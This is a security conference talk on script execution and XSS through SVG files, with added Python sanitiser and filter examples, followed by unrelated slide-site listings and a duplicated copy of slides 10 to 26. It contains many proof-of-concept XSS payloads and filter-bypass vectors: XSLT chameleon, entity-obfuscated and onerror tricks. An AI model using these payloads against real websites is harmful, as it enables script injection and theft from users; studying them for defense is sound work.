The Image that called me
Active Content Injection with SVG Files

A presentation by Mario Heiderich, 2011
Introduction
●   Mario Heiderich
    ●   Researcher and PhD student at the Ruhr-University, Bochum
    ●   Security Researcher for Microsoft, Redmond
    ●   Security Consultant for XING AG, Hamburg
    ●   Published author and international speaker
    ●   HTML5 Security Cheatsheet / H5SC
    ●   PHPIDS Project
Today
●   SVGs and the modern web
    ●   What are SVGs?
    ●   What are they capable of?
    ●   Which browsers “understand” SVG?
    ●   Why are there conflicting areas?

●   And what does that have to do with
    security?
SVG Images
●   Scalable Vector Graphics
●   XML based, therefore
    ●   Versatile
    ●   Accessible
    ●   Compressible
    ●   “Stylable” w. CSS
    ●   Open
●   Great for mobile devices
●   Easy to parse and process
●   Ancient format, older than 10 years
●   Relations to HTML5, the living standard
SVG History
●   Proposed by several W3C members in 1998
●   Derived from Adobe PostScript and VML
●   Developed in 1999
●   Currently at version 1.1
    ●   Version 1.2 still a working draft
    ●   Might be overtaken by SVG 2.0
●   Good browser support
    ●   Gecko, Webkit, Presto, and Trident
Basic Example


<svg xmlns="http://www.w3.org/2000/svg">
  <circle r="40" fill="red"></circle>
</svg>
SVG Family
●   SVG Tiny 1.2
    ●   Designed for cellphones and smartphones
    ●   47 Tags
●   SVG Basic 1.1
    ●   Designed for handhelds, tablets and netbooks
    ●   71 tags
●   SVG Full 1.1
    ●   Full feature set
    ●   81 tags
Features
●   Geometrical shapes
    ●   Circles, ellipses, squares, lines and more
    ●   SVG fonts
●   Font specific formatting and glyph styles
●   Links
●   Animations and Transformations
●   Gradients and Effects
●   Meta-data
●   Scripting and Events
●   Inclusion of arbitrary objects
SVG in Action
Scripting
●   The following SVG executes JavaScript

<svg xmlns="http://www.w3.org/2000/svg">
  <script>
    alert(1)
  </script>
</svg>



●   More examples?
More Scripting
<svg xmlns="http://www.w3.org/2000/svg">
   <g onload="javascript:alert(1)"></g>
</svg>

<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink">
   <animation xlink:href="javascript:alert(1)"/>
</svg>

<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink">
   <foreignObject xlink:href="javascript:alert(1)"/>
</svg>

<svg xmlns="http://www.w3.org/2000/svg">
   <set attributeName="onmouseover" to="alert(1)"/>
</svg>

<svg xmlns="http://www.w3.org/2000/svg">
   <handler
       xmlns:ev="http://www.w3.org/2001/xml-events"
       ev:event="load"
   >alert(1)</handler>
</svg>
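Every vector on this slide is well-formed XML, so a parser-based check on the upload path can see each of them once the document is decoded. The inspector below is an added example written for this page; it is not code from the talk and not the SVGPurifier mentioned in the Future Work slide. It uses only the standard library's expat bindings, the real SVG, XLink and XML namespace URIs, and a set of constructed sample files. The policy is deliberately strict: anything that is not well-formed, carries a DOCTYPE or entity declaration, uses a processing instruction, lives outside the SVG namespace, carries an event attribute or a script URL, or references anything other than a fragment is reported; the caller decides whether to reject the file or to rasterize it. Note that the DOCTYPE common in exported drawings is reported too, so a deployment may prefer to strip it rather than reject.

```python
import re
import xml.parsers.expat as expat

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
XML_NS = "http://www.w3.org/XML/1998/namespace"
ALLOWED_ATTR_NS = {"", XLINK_NS, XML_NS}   # unprefixed, xlink:*, xml:*

# Elements that carry script or embed a foreign document (SVG 1.1 / Tiny 1.2).
ACTIVE_ELEMENTS = {"script", "handler", "foreignObject"}
# Animation elements are harmless alone but can rewrite an event attribute
# or a reference, as <set attributeName="onmouseover"> on the slide does.
ANIMATION_ELEMENTS = {"set", "animate", "animateMotion", "animateTransform",
                      "animateColor", "animation"}


class _Reject(Exception):
    """Raised from a handler to stop expat before it expands any entity."""


def _split(qname):
    """expat reports namespaced names as 'uri local'; return (uri, local)."""
    uri, _, local = qname.rpartition(" ")
    return uri, local


def _scheme_view(value):
    """Normalise a value the way a URL parser does before the scheme is
    compared: drop ASCII tab/LF/CR, strip surrounding whitespace, fold case."""
    return re.sub(r"[\t\n\r]", "", value).strip().lower()


def inspect_svg(doc):
    """Return a list of findings for an SVG document (str or bytes).
    An empty list means none of the constructs checked here were seen."""
    findings = []
    parser = expat.ParserCreate(namespace_separator=" ")

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append("DOCTYPE declaration (system id %r, internal subset %s)"
                        % (sysid, bool(has_internal_subset)))

    def on_entity(name, *_):
        findings.append("entity declaration %r" % name)
        raise _Reject()            # never let the body reference it

    def on_pi(target, _data):
        findings.append("processing instruction <?%s?>" % target)

    def on_start(qname, attrs):
        ns, local = _split(qname)
        if ns != SVG_NS:
            findings.append("element <%s> outside the SVG namespace (%s)"
                            % (local, ns or "no namespace"))
        if local in ACTIVE_ELEMENTS:
            findings.append("active element <%s>" % local)
        for aqname, value in attrs.items():
            ans, alocal = _split(aqname)
            if alocal.lower().startswith("on"):
                findings.append("event handler attribute %s on <%s>" % (alocal, local))
            elif ans not in ALLOWED_ATTR_NS:
                findings.append("attribute %s from foreign namespace %s on <%s>"
                                % (alocal, ans, local))
            if alocal == "href" and not value.lstrip().startswith("#"):
                findings.append("non-fragment reference href=%r on <%s>" % (value, local))
            elif _scheme_view(value).startswith("javascript:"):
                findings.append("script URL in attribute %s on <%s>" % (alocal, local))
            if (local in ANIMATION_ELEMENTS and alocal == "attributeName"
                    and (value.lower().startswith("on") or value == "href")):
                findings.append("<%s> animating %s" % (local, value))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ProcessingInstructionHandler = on_pi
    parser.StartElementHandler = on_start
    try:
        parser.Parse(doc, True)
    except _Reject:
        pass
    except expat.ExpatError as err:
        findings.append("not well-formed XML: %s" % err)
    return findings


# Constructed samples: a plain drawing, then the vectors listed on the slide.
SAMPLES = {
    "plain": '<svg xmlns="%s"><circle r="40" fill="red"/></svg>' % SVG_NS,
    "onload": '<svg xmlns="%s"><g onload="alert(1)"/></svg>' % SVG_NS,
    "foreignObject": '<svg xmlns="%s" xmlns:xlink="%s">'
                     '<foreignObject xlink:href="javascript:alert(1)"/></svg>'
                     % (SVG_NS, XLINK_NS),
    "set": '<svg xmlns="%s"><set attributeName="onmouseover" to="alert(1)"/></svg>'
           % SVG_NS,
    "handler": '<svg xmlns="%s"><handler xmlns:ev="http://www.w3.org/2001/xml-events" '
               'ev:event="load">alert(1)</handler></svg>' % SVG_NS,
    "dtd": '<?xml-stylesheet type="text/xml" href="#s"?>'
           '<!DOCTYPE svg [<!ENTITY e "x">]><svg xmlns="%s">&e;</svg>' % SVG_NS,
    "broken": "<svg><circle r=40 fill=red></svg>",
}

if __name__ == "__main__":
    for label, sample in SAMPLES.items():
        print("%-14s %s" % (label, inspect_svg(sample) or "no findings"))
```

The entity handler stops the parser on the first declaration rather than letting expat expand it, so the check never pays for an entity bomb; a parse error is itself a finding, because a file the strict parser cannot read is not a file you want a browser to guess its way through.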
Deploying SVGs
●   Several ways of deploying SVGs,
    implemented by modern browsers
●   Five important ones are:
    ●   Opening the file directly
    ●   Deployment via <object> or <embed>
    ●   Deployment via <img> or <image>
    ●   Deployment via CSS background/list-style/content/cursor
    ●   In-line SVG
Security Boundaries
●   SVG capabilities based on deployment
    method
●   A model, based on expectations
●   Heterogeneous implementations


●   And a whole new world of bugs and
    vulnerabilities
XSS
●   SVGs deployed via <img> and <image> tags should
    not execute JavaScript
●   Same goes for SVGs used via CSS
●   Or SVG fonts


●   SVGs deployed via <iframe>, <embed> or <object>
    should, though
●   So browsers need different approaches


●   Learning by fixing?
Local SVGs
●   SVGs opened directly are allowed to script
●   Imagine the following attack:
    ●   Attacker uploads an image with an exciting motif to a server
    ●   Victim navigates to the image, likes it, and saves it locally, to the
        downloads folder or the desktop
    ●   Victim wants to watch the image again and double-clicks it
    ●   Image is an SVG and executes JavaScript locally
    ●   Attacker can read local files (same directory, sub-folders)
    ●   Attacker can even load and start Java applets or worse
●   Very likely to be used in real life attacks!
●   Porn sites, Email attachments, Malware
In-line SVG
●   Suggested by the HTML5 specs
●   Working on all modern browsers
    ●   Opera 11 recently joined in
●   No strict XML parser anymore
    ●   <svg><circle r=40 fill=red></svg>
    ●   See – no quotes, no trailing slash
●   Reduced feature set
●   <svg> introduces many new XSS vectors
●   XSS filter bypasses
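The unquoted snippet above is the point where a defender's validation model breaks: a strict XML parser rejects it, the HTML parser accepts it, and a check that an upload "is valid XML" therefore says nothing about how an in-line copy of the same markup will be tokenised. The following is an added example, not code from the talk: it runs the slide's snippet, a well-formed standalone equivalent, and the tolerance example from the Chromium slide later in the talk through Python's strict XML parser and its HTML tokenizer. Python's html.parser approximates the HTML5 tokenizer; a browser may differ in detail, but the lesson is the same: in-line SVG has to be sanitised by an HTML-aware sanitiser, not by an XML check.

```python
from html.parser import HTMLParser
import xml.etree.ElementTree as ET

# Constructed inputs: the unquoted in-line snippet from the slide above, a
# well-formed standalone equivalent, and the tolerance example from the
# Chromium slide later in the talk.
LOOSE = "<svg><circle r=40 fill=red></svg>"
STRICT = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="40" fill="red"/></svg>'
TOLERANT = "1<svg <g onload=alert(1) </p>"


def xml_accepts(doc):
    """True when a strict XML parser (expat behind ElementTree) accepts doc."""
    try:
        ET.fromstring(doc)
        return True
    except ET.ParseError:
        return False


class TagCollector(HTMLParser):
    """Record every start tag the HTML tokenizer emits, with its attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, attrs))

    def handle_startendtag(self, tag, attrs):
        # Self-closing syntax: record it once instead of the default
        # start-then-end pair.
        self.tags.append((tag, attrs))


def html_tags(doc):
    """Start tags as (name, [(attribute, value), ...]) produced for doc."""
    collector = TagCollector()
    collector.feed(doc)
    collector.close()
    return collector.tags


def event_attributes(doc):
    """(tag, attribute) pairs for every attribute whose name starts with 'on':
    what an HTML-aware sanitiser has to strip from an in-line island even
    though an XML parser would never have produced an element for it."""
    return [(tag, name) for tag, attrs in html_tags(doc)
            for name, _ in attrs if name and name.startswith("on")]


if __name__ == "__main__":
    for label, doc in (("loose", LOOSE), ("strict", STRICT), ("tolerant", TOLERANT)):
        print(label, "| XML accepts:", xml_accepts(doc), "| HTML tags:", html_tags(doc))
```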
Scoping
●   SVG images are treated by browsers similarly to XML
●   Same goes for in-line SVG blocks
●   XML treats plain-text tags differently
    ●   Entities and canonical character representations are treated equally
    ●   0-Day filter bypasses ahead
●   This enables a new attack technique on Firefox and other browsers


●   DEMO


●   And it's even worse
●   In-line SVG “self-terminates” open HTML elements
Opera
●   A long history of SVG flaws
    ●   JavaScript execution via SVG fonts
    ●   XSS via CSS background images
    ●   SVG containing XHTML renders HTML via <img>


●   Today SVGs deployed via CSS/<img> cannot script
    anymore
●   But - not all kinds of attacks need scripting to succeed


●   DEMO
Firefox
●   SVG/HTML Chameleon
    <?xml version="1.0"?>
    <?xml-stylesheet type="text/xml" href="#stylesheet"?>
    <!DOCTYPE doc [
    <!ATTLIST xsl:stylesheet
       id  ID #REQUIRED>
    ]>
    <svg xmlns="http://www.w3.org/2000/svg">
        <xsl:stylesheet id="stylesheet" version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
           <xsl:template match="/">
               <iframe
                  xmlns="http://www.w3.org/1999/xhtml"
               src="javascript:alert(1)">
               </iframe>
           </xsl:template>
        </xsl:stylesheet>
        <circle fill="red" r="40"></circle>
    </svg>
Opera
●   Using entities to execute JavaScript
●   innerHTML copy/decompile bug
    <a href="#">CLICKME 1</a>

    <svg style=display:none><style>

    &ast;{
    -
    o&#45fabbalink&colon;&apos;javascript&colon;alert&lpar;1
    &rpar;&apos;&semi; -o&#45fabbalink-source&colon;current
    <span/>


    <a href="#">CLICKME 2</a>
More Opera
●   SVG via favicon
Chromium
●   Incredible parser tolerance
●   1<svg <g onload=alert(1) </p>
Firefox
●   Enabling XSS via entity decoding
●   Entities in <style> tags create new
    elements
●   Even broken ones, half-broken to be
    honest
●   Bug #650001

    <svg>
    <style>&ltimg/src=x onerror=alert(1)//
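The Scoping slide's point that entities and canonical character representations are treated equally, and the Opera and Firefox entity slides that follow it, all come down to one filter-writing mistake: matching keywords on the raw bytes instead of on what the parser decodes. The example below is added for this page and is not code from the talk. It contrasts a byte-level keyword filter with a check run after decoding, and it does the decoding twice because the two deployment contexts decode differently: a standalone SVG file knows only numeric references and the five predefined XML entities, while an in-line island is tokenised by the HTML parser, whose entity table also contains named references such as &colon; and the legacy, semicolon-less &lt. The sample documents are constructed; the namespace URIs are the real ones.

```python
import html
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Constructed sample 1: a standalone SVG file. Only numeric character
# references and the five predefined entities are legal here; the scheme of
# the second link is split by a tab reference, which XML keeps as a tab.
XML_SAMPLE = (
    '<svg xmlns="%s" xmlns:xlink="%s">'
    '<a xlink:href="&#106;ava&#x73;cript&#58;alert(1)"><text>x</text></a>'
    '<image xlink:href="java&#9;script:alert(1)"/>'
    '<style>&lt;img src=x onerror=alert(1)&gt;</style>'
    '</svg>' % (SVG_NS, XLINK_NS))

# Constructed sample 2: the same idea inside an in-line <svg> island of an
# HTML page. Named references such as &colon; and the legacy, semicolon-less
# &lt are decoded by the HTML tokenizer and by html.unescape alike.
INLINE_SAMPLE = (
    '<svg><a href="javascript&colon;alert&lpar;1&rpar;"><text>x</text></a>'
    '<style>&ltimg src=x onerror=alert(1)</style></svg>')

# The sort of keyword pattern a byte-level filter applies.
KEYWORD = re.compile(r"javascript\s*:|<\s*(?:img|script)\b", re.I)


def url_view(value):
    """Mirror what the URL parser does before comparing the scheme: ASCII
    tab, LF and CR are removed and surrounding whitespace is stripped."""
    return re.sub(r"[\t\n\r]", "", value).strip()


def byte_filter_hits(doc):
    """Keywords visible in the raw bytes, without any decoding."""
    return sorted({m.group(0).lower() for m in KEYWORD.finditer(doc)})


def xml_decoded_hits(doc):
    """Standalone SVG: parse as XML first (expat decodes the references),
    then check decoded attribute values and text. Returns (element,
    attribute or '#text', decoded value) triples."""
    hits = []
    for el in ET.fromstring(doc).iter():
        tag = el.tag.rpartition("}")[2]
        for name, value in el.attrib.items():
            if KEYWORD.search(url_view(value)):
                hits.append((tag, name.rpartition("}")[2], value))
        if el.text and KEYWORD.search(el.text):
            hits.append((tag, "#text", el.text))
    return hits


def inline_decoded_hits(doc):
    """In-line SVG in HTML: decode with the HTML5 entity table and rerun the
    keyword check on the result."""
    return byte_filter_hits(html.unescape(doc))


if __name__ == "__main__":
    print("raw bytes, XML file   :", byte_filter_hits(XML_SAMPLE))
    print("decoded, XML file     :", xml_decoded_hits(XML_SAMPLE))
    print("raw bytes, inline SVG :", byte_filter_hits(INLINE_SAMPLE))
    print("decoded, inline SVG   :", inline_decoded_hits(INLINE_SAMPLE))
```

The byte-level pass returns nothing for either sample; both decoded passes find the link and the element hidden in the style text. The tab-split link shows that decoding alone is not enough either: the comparison has to normalise the value the way the URL parser will, or the scheme check misses it.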
Other Browsers
●   Firefox 4 crashed badly on SVGs embedding JS
●   Chrome produces weird things when using
    <foreignObject> and <iframe>
●   Opera deploys Java applets via SVG fonts
●   And what about other XML related attack patterns?
    ●   External entities
    ●   SVG Tiny 1.2 Java Events
    ●   Entity bombs
    ●   Etc. etc.
●   Some browsers support SVG masks, perfect for clickjacking
●   SVG and XBL? You tell me!
Wrap-Up
●   SVGs are not just images but mini-applications
●   <img> tags can now deploy Java, PDF and Flash – and call you
    on Skype
●   In-line SVG creates small XML islands enabling XML attacks on
    HTML websites
●   SVG and XSLT work too, enabling DoS and other attacks
●   Web-security and XML security, they meet again!
●   And XXE is back – remember 2002's advisories?


●   SVG is not getting enough attention in the security
    community
●   SVG provides a lot of room for more security research
Defense
●   More difficult than one might assume
    ●   No existing filter libs
    ●   No good documentation
    ●   XSS vectors are hard to comprehend
    ●   New vectors coming up weekly


●   SVG files should not be perceived as images
●   Allowing SVG for upload == allowing HTML for upload
●   SVG can embed, link or reference any kind of content
    over cross domain borders
●   SVG provides new ways of payload obfuscation
Future Work
●   SVG Purifier
    ●   Based on HTMLPurifier 4.3.0
    ●   Still very young
    ●   Smoke-test has been published http://heideri.ch/svgpurifier
●   More articles on the HTML5 Sec Cheatsheet Wiki
●   Publications, to raise awareness
    ●   Crouching Tiger – Hidden Payload, submission CCS 2011
●   More demo vectors on the H5SC to demonstrate impact


●   OWASP research and documentation?
Links
●   Wikipedia on SVG http://en.wikipedia.org/wiki/Scalable_Vector_Graphics
●   W3C SVG Working Group http://www.w3.org/Graphics/SVG/
●   SVG Full 1.1 (W3C) http://www.w3.org/TR/SVG11/
    ●   SVG Basic 1.1 and SVG Tiny 1.2 http://www.w3.org/TR/SVGMobile/
    ●   SVG 2.0 http://dev.w3.org/SVG/profiles/2.0/publish/intro.html
●   Adobe's SVG Zone (for archaeologists) http://www.adobe.com/svg/
●   H5SC http://html5sec.org/
●   XSLT and SVG http://scarybeastsecurity.blogspot.com/20...riousity.html
●   Opera SVG Bug http://heideri.ch/opera/
●   HTMLPurifier http://htmlpurifier.org/
●   JSBin http://jsbin.com/
●   SVGPurifier Smoke-Test http://heideri.ch/svgpurifier
●   More SVG fun http://maliciousmarkup.blogspot.com/20...re-xml-fun.html
Thanks
●   Thanks for listening!
●   Questions or Comments?
●   Discussion and tool preview?




●   Thanks to
    ●   Gareth Heyes and Manuel Caballero from UNH
    ●   Alexey Silin / LeverOne
    ●   Erik of Opera
    ●   Dave Ross of Microsoft
carlyakerly1
 
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptxSpecial Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
shyamraj55
 
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded DevelopersLinux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Toradex
 
Heap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and DeletionHeap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and Deletion
Jaydeep Kale
 
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Impelsys Inc.
 
2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx
Samuele Fogagnolo
 
How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?
Daniel Lehner
 
tecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdftecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdf
fjgm517
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdfSAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
Precisely
 
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdfComplete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Software Company
 
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul
 
Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
Technology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data AnalyticsTechnology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data Analytics
InData Labs
 
How analogue intelligence complements AI
How analogue intelligence complements AIHow analogue intelligence complements AI
How analogue intelligence complements AI
Paul Rowe
 
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
Alan Dix
 
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
BookNet Canada
 
Big Data Analytics Quick Research Guide by Arthur Morgan
Big Data Analytics Quick Research Guide by Arthur MorganBig Data Analytics Quick Research Guide by Arthur Morgan
Big Data Analytics Quick Research Guide by Arthur Morgan
Arthur Morgan
 
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven InsightsAndrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell
 
Role of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered ManufacturingRole of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered Manufacturing
Andrew Leo
 
Rusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond SparkRusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond Spark
carlyakerly1
 
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptxSpecial Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
shyamraj55
 
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded DevelopersLinux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Toradex
 
Heap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and DeletionHeap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and Deletion
Jaydeep Kale
 
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Impelsys Inc.
 
2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx
Samuele Fogagnolo
 
How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?
Daniel Lehner
 
tecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdftecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdf
fjgm517
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdfSAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
Precisely
 
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdfComplete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Software Company
 
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul
 

The Image that called me - Active Content Injection with SVG Files

10. Scripting
●   The following SVG executes JavaScript

<svg xmlns="http://www.w3.org/2000/svg">
  <script>alert(1)</script>
</svg>

●   More examples?
11. More Scripting

<svg xmlns="http://www.w3.org/2000/svg">
  <g onload="javascript:alert(1)"></g>
</svg>

<svg xmlns="http://www.w3.org/2000/svg">
  <animation xlink:href="javascript:alert(1)"/>
</svg>

<svg xmlns="http://www.w3.org/2000/svg">
  <foreignObject xlink:href="javascript:alert(1)"/>
</svg>

<svg xmlns="http://www.w3.org/2000/svg">
  <set attributeName="onmouseover" to="alert(1)"/>
</svg>

<svg xmlns="http://www.w3.org/2000/svg">
  <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">alert(1)</handler>
</svg>
12. Deploying SVGs
●   Several ways of deploying SVGs, implemented by modern browsers
●   Five important ones are:
    ●   Opening the file directly
    ●   Deployment via <object> or <embed>
    ●   Deployment via <img> or <image>
    ●   Deployment via CSS background/list-style/content/cursor
    ●   In-line SVG
13. Security Boundaries
●   SVG capabilities based on deployment method
●   A model, based on expectations
●   Heterogeneous implementations
●   And a whole new world of bugs and vulnerabilities
14. XSS
●   SVGs deployed via <img> and <image> tags should not execute JavaScript
    ●   Same goes for SVGs used via CSS
    ●   Or SVG fonts
●   SVGs deployed via <iframe>, <embed> or <object> should, though
●   So browsers need different approaches
●   Learning by fixing?
15. Local SVGs
●   SVGs opened directly are allowed to script
●   Imagine the following attack:
    ●   Attacker uploads an image with an exciting motif to a server
    ●   Victim navigates to the image, likes it, saves it locally to the downloads folder or desktop
    ●   Victim wants to view the image again and double-clicks it
    ●   Image is an SVG and executes JavaScript locally
    ●   Attacker can read local files (same directory, sub-folders)
    ●   Attacker can even load and start Java applets or worse
●   Very likely to be used in real-life attacks!
    ●   Porn sites, Email attachments, Malware
16. In-line SVG
●   Suggested by the HTML5 specs
●   Working on all modern browsers
    ●   Opera 11 recently joined in
●   No strict XML parser anymore
    ●   <svg><circle r=40 fill=red></svg>
    ●   See – no quotes, no trailing slash
●   Reduced feature set
●   <svg> introduces many new XSS vectors
    ●   XSS filter bypasses
17. Scoping
●   SVG images are treated by browsers similarly to XML
●   Same goes for in-line SVG blocks
●   XML treats plain-text tags differently
    ●   Entities and canonical character representations are treated equally
    ●   0-Day filter bypasses ahead
●   This enables a new attack technique on Firefox and other browsers
●   DEMO
●   And it's even worse
    ●   In-line SVG “self-terminates” open HTML elements
18. Opera
●   A long history of SVG flaws
    ●   JavaScript execution via SVG fonts
    ●   XSS via CSS background images
    ●   SVG containing XHTML renders HTML via <img>
●   Today SVGs deployed via CSS/<img> cannot script anymore
●   But - not all kinds of attacks need scripting to succeed
●   DEMO
19. Firefox
●   SVG/HTML Chameleon

<?xml version="1.0"?>
<?xml-stylesheet type="text/xml" href="#stylesheet"?>
<!DOCTYPE doc [
  <!ATTLIST xsl:stylesheet id ID #REQUIRED>
]>
<svg xmlns="http://www.w3.org/2000/svg">
  <xsl:stylesheet id="stylesheet" version="1.0"
      xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
    <xsl:template match="/">
      <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)">
      </iframe>
    </xsl:template>
  </xsl:stylesheet>
  <circle fill="red" r="40"></circle>
</svg>
20. Opera
●   Using entities to execute JavaScript
●   innerHTML copy/decompile bug

<a href="#">CLICKME 1</a>
<svg style=display:none><style>
&ast;{
  - o&#45fabbalink&colon;&apos;javascript&colon;alert&lpar;1&rpar;&apos;&semi;
  -o&#45fabbalink-source&colon;current
<span/>
<a href="#">CLICKME 2</a>
21. More Opera
●   SVG via favicon
22. Chromium
●   Incredible parser tolerance

1<svg <g onload=alert(1) </p>
23. Firefox
●   Enabling XSS via entity decoding
●   Entities in <style> tags create new elements
    ●   Even broken ones, half-broken to be honest
●   Bug #650001

<svg>
<style>&ltimg/src=x onerror=alert(1)//
24. Other Browsers
●   Firefox 4 crashed badly on SVGs embedding JS
●   Chrome produces weird things when using <foreignObject> and <iframe>
●   Opera deploys Java applets via SVG fonts
●   And what about other XML related attack patterns?
    ●   External entities
    ●   SVG Tiny 1.2 Java Events
    ●   Entity bombs
    ●   Etc. etc.
●   Some browsers support SVG Masks, perfect for click-jacking
●   SVG and XBL? You tell me!
25. Wrap-Up
●   SVGs are not just images but mini-applications
●   <img> tags can now deploy Java, PDF and Flash – and call you on Skype
●   In-line SVG creates small XML islands enabling XML attacks on HTML websites
●   SVG and XSLT work too, enabling DoS and other attacks
●   Web-security and XML security, they meet again!
●   And XXE is back – remember 2002's advisories?
●   SVG is not getting enough attention in the security community
●   SVG provides a lot of room for more security research
26. Defense
●   More difficult than one might assume
    ●   No existing filter libs
    ●   No good documentation
    ●   XSS vectors are hard to comprehend
    ●   New vectors coming up weekly
●   SVG files should not be perceived as images
    ●   Allowing SVG for upload == allowing HTML for upload
